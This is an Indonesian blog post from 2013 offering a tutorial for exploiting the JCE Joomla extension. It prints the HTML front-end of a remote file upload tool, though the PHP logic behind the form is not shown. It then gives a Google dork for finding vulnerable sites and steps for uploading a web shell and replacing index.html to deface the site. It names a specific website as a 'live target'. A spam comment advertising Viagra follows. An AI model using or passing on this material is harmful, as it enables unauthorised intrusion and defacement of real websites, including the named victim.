Monday, May 13, 2013

Exploit JCE Joomla Extension

Asslamualaikum,  Maaf Sebelumnya saya jarang mempost, karna berhubung banyak nya tugas sekolah an yang harus saya selesaikan
Gk usah lama" , langsung Check This Out !!!!
Copas Dulu File JCEnya :
<html>
<head>
<title>JCE Joomla Extension Remote File Upload</title>
<link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js" type="text/javascript"></script>
<style type"text/css">
body {
background:#e1e1e1;
font-family: orbitron;
padding:4;
width:98%;
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 6px 6px 6px 6px;
-moz-border-radius: 6px 6px 6px 6px;
border-radius: 6px 6px 6px 6px;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
}
#header {
color:#00FF00;
text-align:center;
text-shadow:1px 2px 3px #0000FF;
font-size:30px;
}
.tablenya{
}
.atas1 {
width:30%;
font-size:18px;
font-weight:bold;
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 6px 0 0 0;
-moz-border-radius: 6px 0 0 0;
border-radius: 6px 0 0 0;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
}
.atas2 {
width:50%;
font-size:18px;
font-weight:bold;
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 0 6px 0 0;
-moz-border-radius: 0 6px 0 0;
border-radius: 0 6px 0 0;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
color:#FF0000;
}
.tengah1 {
width:30%;
font-size:18px;
font-weight:bold;
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 0 0 0 0;
-moz-border-radius: 0 0 0 0;
border-radius: 0 0 0 0;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
}
.tengah2 {
width:50%;
font-size:18px;
font-weight:bold;
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 0 0 0 0;
-moz-border-radius: 0 0 0 0;
border-radius: 0 0 0 0;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
color:#FF0000;
}
.required {
text-align:right;
color:#FF0000;
position:fixed;
right:3%;
}
input {
font-size:18px;
font-weight:bold;
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 6px 6px 6px 6px;
-moz-border-radius: 6px 6px 6px 6px;
border-radius: 6px 6px 6px 6px;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
color:#FF0000;
}
.start {
text-align:center;
color:#FF0000;
}
#footer {
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 0 0 6px 6px;
-moz-border-radius: 0 0 6px 6px;
border-radius: 0 0 6px 6px;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
}
/*NoScript*/
#enjs {z-index: 999;position:fixed;top:0;left:0;width:100%;height:100%;background-color:#000;margin:0;padding:0;}
#enjs p {margin:0;padding:0;width:100%;color:#333;position:relative;top:40%;font:bold 18px/20px arial;text-align:center;text-shadow:none;}
/*ScrollBar */
::-webkit-scrollbar {width: 12px;}
::-webkit-scrollbar-track {background:rgb(71, 71, 71);}
::-webkit-scrollbar-thumb, ::-webkit-scrollbar-thumb:window-inactive { background: rgb(34, 34, 34); }

#loading-overlay {position:fixed;top:0;left:0;right:0;bottom:0;background:#000000;z-index:999999;text-align:center;width:100%;height:100%;padding-top:22%;color:#FF0000;}
.ball {background-color: transparent;border:5px solid rgb(240 ,0 , 0);border-right:5px solid transparent;border-left:5px solid transparent;border-radius:50px;box-shadow: 0 0 35px rgb(255 ,0 , 0);width:50px;height:50px;margin:0 auto;-moz-animation:spinPulse 1s infinite ease-in-out;-webkit-animation:spinPulse 1s infinite linear;}
.ball1 {background-color: transparent;border:5px solid rgb(240 ,0 , 0);border-left:5px solid transparent;border-right:5px solid transparent;border-radius:50px;box-shadow: 0 0 15px rgb(255 ,0 , 0);width:30px;height:30px;margin:0 auto;position:relative;top:-50px;-moz-animation:spinoffPulse 1s infinite linear;-webkit-animation:spinoffPulse 1s infinite linear;}
@-moz-keyframes spinPulse {0% { -moz-transform:rotate(160deg); opacity:0; box-shadow:0 0 1px rgb(255, 0, 0)}50% { -moz-transform:rotate(145deg); opacity:1; }100% { -moz-transform:rotate(-320deg); opacity:0; }}
@-moz-keyframes spinoffPulse {0% { -moz-transform:rotate(0deg); } 100% { -moz-transform:rotate(360deg); }}
@-webkit-keyframes spinPulse {0% { -webkit-transform:rotate(160deg); opacity:0; box-shadow:0 0 1px rgb(255, 0, 0)} 50% { -webkit-transform:rotate(145deg); opacity:1;} 100% { -webkit-transform:rotate(-320deg); opacity:0; }}
@-webkit-keyframes spinoffPulse {0% { -webkit-transform:rotate(0deg); } 100% { -webkit-transform:rotate(360deg); }}
</style>
</head>
<body>
<div id="header">-=[ JCE Joomla Extension Remote File Upload ]=-</div><br>
<form name="form1" action="" enctype="multipart/form-data" method="post">
<table class="tabelnya">
<tr>
  <td class="atas1">hostname (ex:www.sitename.com):</td>
<td class="atas2"><input name="host" size="90"> *</td>
</tr>
<tr>
<td class="tengah1">path (ex: /joomla/ or just / ):</td>
<td class="tengah2"><input name="path" size="90"> *</td>
 </tr>
<tr>
<td class="tengah1">Please specify a file to upload:</td>
<td class="tengah2"><input type="file" name="datafile" size="88"> *</td>
</tr>
<tr>
<td class="tengah1">specify a port (default is 80):</td>
    <td class="tengah2"><input name="port" size="90"></td>
</tr>
<tr>
<td class="tengah1">Proxy (ip:port):</td>
<td class="tengah2"><input name="proxy" size="90"></td>
</tr>
</table>
<div id="footer">
<div class="required">*fields are required</div>
    <br>
<div class="start"><input type="submit" value="Start" name="Submit"></div>
<br>
</div>
</form>
<div class="start">&copy 2013 ShadoWNamE</div>
<div id="loading-overlay">
<div class="ball"></div>
<div class="ball1"></div>
<h3>Loading..............</h3>
</div>
<script>
// hilangkan overlay dengan efek .fadeOut() jika keseluruhan halaman telah selesai dimuat
$(window).bind("load", function() {
$("#loading-overlay").fadeOut();
});
</script>
</body></html>

Dork : 
 inurl:index.php?option=com_jce
Oke, Langsung Aja Tutornya nya ^_^

1. Upload File Php nya Di Shell Agan / Localhost



2.  Masukan Dork Ke Google

3. Keluar tuh Banyak Website, Coba 1-1 yah :D , Tapi Saya Disini Sudah Punya Live Target
www.saintpatricktemuco.cl
 4. Masukan Url Site nya Ke  " hostname (ex:www.sitename.com): " ,
    Contoh : www.saintpatricktemuco.cl ( tanpa http:// dan / )
5. Di Path : path (ex: /joomla/ or just / ):
Contoh : www.site.com/joomla/ ( Untuk Path bisa gunakan /joomla/ atau kalau di website tidak mempunyai path bisa gunakan / saja )

6. Pilih Shell Yang Akan Kalian Upload 

7.Klik START !!!

8. Buka deh tuh shell nya

9. Cari file " index.html " ( tanpa tanda kutip ) , Klik E / Edit

10 Pasang Script Agan , Klik Save

11. Lalu Buka Link nya http://www.saintpatricktemuco.cl/images/stories/index.html


Sekian Tutor dari saya, maaf-maaf bila ada salah kata ... Jika kita terus berusaha, semua akan pasti bisa ^_^
Terima kasih , Wassalamualikum Wr. Wb.


sumber

1 comment:

  1. It is very Informative Post..... I Like this Post.... Thanks for Sharing this Informative Post with us.....


    Buy Generic Viagra | Generic Cialis - pharmaonlinerx.com

    ReplyDelete